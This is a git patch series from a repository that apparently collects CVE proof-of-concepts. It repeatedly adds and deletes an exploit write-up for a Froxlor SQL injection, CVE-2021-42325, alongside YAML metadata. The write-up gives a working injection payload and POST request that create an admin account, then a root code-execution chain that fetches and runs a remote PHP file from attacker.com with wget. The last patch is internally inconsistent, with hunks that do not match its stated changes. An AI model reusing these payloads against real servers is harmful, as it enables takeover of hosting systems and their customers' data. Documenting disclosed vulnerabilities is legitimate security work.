@@ -0,0 +1,89 @@ +- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +- Exploit Author: Martin Cernac +- Date: 2021-11-05 +- Vendor: Froxlor (https://froxlor.org/) +- Software Link: https://froxlor.org/download.php +- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +- Patched Version: 0.10.30 +- Category: Web Application +- Tested on: Ubuntu +- CVE: 2021-42325 + + +### 1. Technical Description: +Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. + +#### 1.1 Pre-requisites + - Access to a customer account + - Ability to specify database name when creating a database + - Feature only availible from 0.10.28 onward and must be manually enabled + +### 2. Proof Of Concept (PoC): + +The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root +# +#### 2.1 Privilege Escalation + + - Sign into Froxlor as a customer + - View your databases + - Create a database + - Put your payload into the "User/Database name" field (if enabled) + - Application will error out however your SQL query will be executed + The following is a POST request example of running the payload provided, resulting in an administrator account being created + + +``` +POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded +Content-Length: 448 
+s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 + +``` + + +#### 2.2 Remote Code Execution + + To achieve RCE as root: + + - Sign into Froxlor as the newly created admin account (payload example creds are x:a) + - Go to System Settings + - Go to Webserver settings + - Adjust "Webserver reload command" field to a custom command + - The command must not contain any of the following special characters: ;|&><`$~? + - For details, see "safe_exec" function in lib/Froxlor/FileDir.php + - For example commands see Payloads 4.2 section + - Trigger configuration file rebuild + - Use menu item "Rebuild config files" + - Await a root cron job to execute your command + +### 3. Vulnerable resources and parameters + /customer_mysql.php (POST field: custom_suffix) + + +### 4. Payloads + +#### 4.1 SQL Injection payload + The following payload creates a new Froxlor admin with full access to all customers and the server configuration + The credentials are: + - username: x + - password: a + + `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- + + +#### 4.2 Remote Code Execution payload + Two part payload: + - wget http://attacker.com/malicious.txt -O /runme.php + - php /runme.php + +### 5. Timeline + 2021-10-11 Discovery + 2021-10-11 Contact with developer + 2021-10-11 Patch issued but no release rolled out + 2021-10-12 Reserved CVE-2021-42325 + 2021-11-05 Fix release rolled out + 2021-11-07 Public disclosure + +### 6. 
References: + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file -- Gitee From 0e4d86452245df00b929d9a7b2a5512129aa8720 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:51:41 +0000 Subject: [PATCH 19/31] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Froxlor/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2021/.keep diff --git a/cve/Froxlor/2021/.keep b/cve/Froxlor/2021/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From ed2ec2f15b349cc88169c52f9eba6a12500d88cc Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:52:17 +0000 Subject: [PATCH 20/31] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-42325?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/CVE-2021-42325/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2021/CVE-2021-42325/.keep diff --git a/cve/Froxlor/2021/CVE-2021-42325/.keep b/cve/Froxlor/2021/CVE-2021-42325/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 6155ae32cca85feeb4f3042a8d2b2a25c00ca148 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:52:44 +0000 Subject: [PATCH 21/31] add cve/Froxlor/2021/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2021/CVE-2021-42325/README.md | 89 +++++++++++++++++++++++ 1 file changed, 89 insertions(+) create mode 100644 cve/Froxlor/2021/CVE-2021-42325/README.md diff --git a/cve/Froxlor/2021/CVE-2021-42325/README.md b/cve/Froxlor/2021/CVE-2021-42325/README.md new file mode 100644 index 00000000..3a4391d3 --- /dev/null +++ b/cve/Froxlor/2021/CVE-2021-42325/README.md 
@@ -0,0 +1,89 @@ +- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +- Exploit Author: Martin Cernac +- Date: 2021-11-05 +- Vendor: Froxlor (https://froxlor.org/) +- Software Link: https://froxlor.org/download.php +- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +- Patched Version: 0.10.30 +- Category: Web Application +- Tested on: Ubuntu +- CVE: 2021-42325 + + +### 1. Technical Description: +Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. + +#### 1.1 Pre-requisites + - Access to a customer account + - Ability to specify database name when creating a database + - Feature only availible from 0.10.28 onward and must be manually enabled + +### 2. Proof Of Concept (PoC): + +The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root +# +#### 2.1 Privilege Escalation + + - Sign into Froxlor as a customer + - View your databases + - Create a database + - Put your payload into the "User/Database name" field (if enabled) + - Application will error out however your SQL query will be executed + The following is a POST request example of running the payload provided, resulting in an administrator account being created + + +``` +POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded +Content-Length: 448 
+s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 + +``` + + +#### 2.2 Remote Code Execution + + To achieve RCE as root: + + - Sign into Froxlor as the newly created admin account (payload example creds are x:a) + - Go to System Settings + - Go to Webserver settings + - Adjust "Webserver reload command" field to a custom command + - The command must not contain any of the following special characters: ;|&><`$~? + - For details, see "safe_exec" function in lib/Froxlor/FileDir.php + - For example commands see Payloads 4.2 section + - Trigger configuration file rebuild + - Use menu item "Rebuild config files" + - Await a root cron job to execute your command + +### 3. Vulnerable resources and parameters + /customer_mysql.php (POST field: custom_suffix) + + +### 4. Payloads + +#### 4.1 SQL Injection payload + The following payload creates a new Froxlor admin with full access to all customers and the server configuration + The credentials are: + - username: x + - password: a + + `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- + + +#### 4.2 Remote Code Execution payload + Two part payload: + - wget http://attacker.com/malicious.txt -O /runme.php + - php /runme.php + +### 5. Timeline + 2021-10-11 Discovery + 2021-10-11 Contact with developer + 2021-10-11 Patch issued but no release rolled out + 2021-10-12 Reserved CVE-2021-42325 + 2021-11-05 Fix release rolled out + 2021-11-07 Public disclosure + +### 6. 
References: + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file -- Gitee From 9a630d60635b55c671c70187a84606f40fa3a7b8 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:52:55 +0000 Subject: [PATCH 22/31] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Froxlor/2021/README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/README.md | 89 -------------------------------------- 1 file changed, 89 deletions(-) delete mode 100644 cve/Froxlor/2021/README.md diff --git a/cve/Froxlor/2021/README.md b/cve/Froxlor/2021/README.md deleted file mode 100644 index 3a4391d3..00000000 --- a/cve/Froxlor/2021/README.md +++ /dev/null 
@@ -1,89 +0,0 @@ -- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) -- Exploit Author: Martin Cernac -- Date: 2021-11-05 -- Vendor: Froxlor (https://froxlor.org/) -- Software Link: https://froxlor.org/download.php -- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 -- Patched Version: 0.10.30 -- Category: Web Application -- Tested on: Ubuntu -- CVE: 2021-42325 - - -### 1. Technical Description: -Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. - -#### 1.1 Pre-requisites - - Access to a customer account - - Ability to specify database name when creating a database - - Feature only availible from 0.10.28 onward and must be manually enabled - -### 2. Proof Of Concept (PoC): - -The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root -# -#### 2.1 Privilege Escalation - - - Sign into Froxlor as a customer - - View your databases - - Create a database - - Put your payload into the "User/Database name" field (if enabled) - - Application will error out however your SQL query will be executed - The following is a POST request example of running the payload provided, resulting in an administrator account being created - - -``` -POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 -Host: localhost -Content-Type: application/x-www-form-urlencoded -Content-Length: 448 
-s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 - -``` - - -#### 2.2 Remote Code Execution - - To achieve RCE as root: - - - Sign into Froxlor as the newly created admin account (payload example creds are x:a) - - Go to System Settings - - Go to Webserver settings - - Adjust "Webserver reload command" field to a custom command - - The command must not contain any of the following special characters: ;|&><`$~? - - For details, see "safe_exec" function in lib/Froxlor/FileDir.php - - For example commands see Payloads 4.2 section - - Trigger configuration file rebuild - - Use menu item "Rebuild config files" - - Await a root cron job to execute your command - -### 3. Vulnerable resources and parameters - /customer_mysql.php (POST field: custom_suffix) - - -### 4. Payloads - -#### 4.1 SQL Injection payload - The following payload creates a new Froxlor admin with full access to all customers and the server configuration - The credentials are: - - username: x - - password: a - - `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- - - -#### 4.2 Remote Code Execution payload - Two part payload: - - wget http://attacker.com/malicious.txt -O /runme.php - - php /runme.php - -### 5. Timeline - 2021-10-11 Discovery - 2021-10-11 Contact with developer - 2021-10-11 Patch issued but no release rolled out - 2021-10-12 Reserved CVE-2021-42325 - 2021-11-05 Fix release rolled out - 2021-11-07 Public disclosure - -### 6. 
References: - https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file -- Gitee From 5c13e6adacb318cfdd13e20814f282a41aa29d16 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:53:13 +0000 Subject: [PATCH 23/31] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2021/yaml/.keep diff --git a/cve/Froxlor/2021/yaml/.keep b/cve/Froxlor/2021/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 29f3c6a335370a7820601524ec9dae8f4aa6cae6 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:03:03 +0000 Subject: [PATCH 24/31] add cve/Froxlor/2021/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2021/yaml/CVE-2021-42325.yaml | 25 +++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cve/Froxlor/2021/yaml/CVE-2021-42325.yaml diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml new file mode 100644 index 00000000..f39d1ec1 --- /dev/null +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml 
@@ -0,0 +1,25 @@ +id: CVE-2021-42325 +source: + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 +info: + name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 + severity: high + description: + Froxlor是Froxlor团队的一套轻量级服务器管理软件。 + Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 + scope-of-influence: + Froxlor 0.9~0.10.30 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 + - https://avd.aliyun.com/detail?id=AVD-2021-42325 + - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html + - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 + - https://www.exploit-db.com/exploits/50502 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-42325 + cwe-id: CWE-89 + cnvd-id: None + kve-id: None + tags: exploit, remote, code execution, sql injection \ No newline at end of file -- Gitee From 38620199407c4ce62a7b487d4659d311ec6e0d45 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:03:28 +0000 Subject: [PATCH 25/31] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Froxlor/2023/CVE-2021-42325?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2023/CVE-2021-42325/README.md | 89 ----------------------- 1 file changed, 89 deletions(-) delete mode 100644 cve/Froxlor/2023/CVE-2021-42325/README.md diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md deleted file mode 100644 index c1b38e2e..00000000 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ /dev/null 
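Review bot: `severity: high` contradicts the `cvss-score: 9.8` a few lines below it — under the CVSS v3.1 qualitative scale a 9.0–10.0 score is Critical, so this should read `severity: critical` (or the score should be lowered to match the label). `scope-of-influence: Froxlor 0.9~0.10.30` also conflicts with the README added in this same series, which lists 0.10.30 as the patched release and says the injectable custom database-name field only exists from 0.10.28 onward; unless the range is copied verbatim from an advisory, `Froxlor 0.10.28 ~ 0.10.29.1` is what the write-up supports. The vector's `PR:N` likewise reads as unauthenticated while the PoC requires a customer login plus an admin-enabled option, so either annotate the metrics as mirrored from NVD or score it with `PR:L`. Minor: `cnvd-id: None` and `kve-id: None` are the literal string "None" to a YAML parser; use `null` (or omit the key) if the field is meant to be empty.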
@@ -1,89 +0,0 @@ -- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) -- Exploit Author: Martin Cernac -- Date: 2021-11-05 -- Vendor: Froxlor (https://froxlor.org/) -- Software Link: https://froxlor.org/download.php -- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 -- Patched Version: 0.10.30 -- Category: Web Application -- Tested on: Ubuntu -- CVE: 2021-42325 - - -### 1. Technical Description: -Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. - -#### 1.1 Pre-requisites - - Access to a customer account - - Ability to specify database name when creating a database - - Feature only availible from 0.10.28 onward and must be manually enabled - -### 2. Proof Of Concept (PoC): - -The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root -# -#### 2.1 Privilege Escalation - - - Sign into Froxlor as a customer - - View your databases - - Create a database - - Put your payload into the "User/Database name" field (if enabled) - - Application will error out however your SQL query will be executed - The following is a POST request example of running the payload provided, resulting in an administrator account being created - - -``` -POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 -Host: localhost -Content-Type: application/x-www-form-urlencoded -Content-Length: 448 
-s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 - -``` - - -#### 2.2 Remote Code Execution - - To achieve RCE as root: - - - Sign into Froxlor as the newly created admin account (payload example creds are x:a) - - Go to System Settings - - Go to Webserver settings - - Adjust "Webserver reload command" field to a custom command - - The command must not contain any of the following special characters: ;|&><`$~? - - For details, see "safe_exec" function in lib/Froxlor/FileDir.php - - For example commands see Payloads 4.2 section - - Trigger configuration file rebuild - - Use menu item "Rebuild config files" - - Await a root cron job to execute your command - -### 3. Vulnerable resources and parameters - /customer_mysql.php (POST field: custom_suffix) - - -### 4. Payloads - -#### 4.1 SQL Injection payload - The following payload creates a new Froxlor admin with full access to all customers and the server configuration - The credentials are: - - username: x - - password: a - - `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- - - -#### 4.2 Remote Code Execution payload - Two part payload: - - wget http://attacker.com/malicious.txt -O /runme.php - - php /runme.php - -### 5. Timeline - 2021-10-11 Discovery - 2021-10-11 Contact with developer - 2021-10-11 Patch issued but no release rolled out - 2021-10-12 Reserved CVE-2021-42325 - 2021-11-05 Fix release rolled out - 2021-11-07 Public disclosure - -### 6. 
References: - https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file -- Gitee From 29d0af2b9bc9425f0843c818d66a573c445ddc4b Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:03:44 +0000 Subject: [PATCH 26/31] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Froxlor/2023/yaml/CVE-2021-42325.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 25 ----------------------- 1 file changed, 25 deletions(-) delete mode 100644 cve/Froxlor/2023/yaml/CVE-2021-42325.yaml diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml deleted file mode 100644 index f7274053..00000000 --- a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2021-42325 -source: - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 -info: - name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 - severity: 高危 - description: | - Froxlor是Froxlor团队的一套轻量级服务器管理软件。 - Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 - scope-of-influence: - Froxlor 0.9~0.10.30 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 - - https://avd.aliyun.com/detail?id=AVD-2021-42325 - - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html - - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 - - https://www.exploit-db.com/exploits/50502 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-42325 - cwe-id: CWE-89 - cnvd-id: None - kve-id: None - tags: exploit, remote, code execution, sql injection \ No newline at end of file -- Gitee From c8307dabb65d32d98835b5958523f41aadd1055a Mon Sep 17 00:00:00 2001 
From: wangyue Date: Mon, 10 Apr 2023 02:03:56 +0000 Subject: [PATCH 27/31] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Froxlor/2021/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2021/yaml/.keep diff --git a/cve/Froxlor/2021/yaml/.keep b/cve/Froxlor/2021/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 005ba167e48c5d895efb9edb3e42f0472269a4d2 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:04:12 +0000 Subject: [PATCH 28/31] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Froxlor/2021/CVE-2021-42325/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/CVE-2021-42325/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2021/CVE-2021-42325/.keep diff --git a/cve/Froxlor/2021/CVE-2021-42325/.keep b/cve/Froxlor/2021/CVE-2021-42325/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From d0dbf233586e0f427641682a6d7868e238f63c2b Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:07:42 +0000 Subject: [PATCH 29/31] update cve/Froxlor/2021/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2021/yaml/CVE-2021-42325.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml index f39d1ec1..f25a97e3 100644 --- a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml @@ -1,6 +1,6 @@ id: CVE-2021-42325 source: - https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high 
@@ -12,8 +12,8 @@ info:
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2021-42325
 - https://avd.aliyun.com/detail?id=AVD-2021-42325
- - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html
- - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782
+ - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html
+ - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782
 - https://www.exploit-db.com/exploits/50502
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-- Gitee From 142e7b491b9fbc13cf8ee013e9dc587ed11abfdb Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 03:22:07 +0000 Subject: [PATCH 30/31] update cve/Froxlor/2021/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue
--- cve/Froxlor/2021/yaml/CVE-2021-42325.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml
index f25a97e3..1d02f52c 100644
--- a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml
+++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml
@@ -1,6 +1,6 @@
 id: CVE-2021-42325
 source:
- https://github.com/Froxlor/Froxlor/releases/tag/0.10.30
+ https://github.com/Froxlor/Froxlor/releases/tag/0.10.30
 info:
 name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
 severity: high
@@ -1,6 +1,6 @@
 id: CVE-2021-42325
 source:
- https://github.com/nomi-sec/PoC-in-GitHub/blob/master/2021/CVE-2021-42325.json
+ https://www.exploit-db.com/exploits/50502
 info:
 name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
 severity: high
@@ -14,7 +14,6 @@ info:
 - https://avd.aliyun.com/detail?id=AVD-2021-42325
 - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html
 - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782
- - https://www.exploit-db.com/exploits/50502
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 9.8
-- Gitee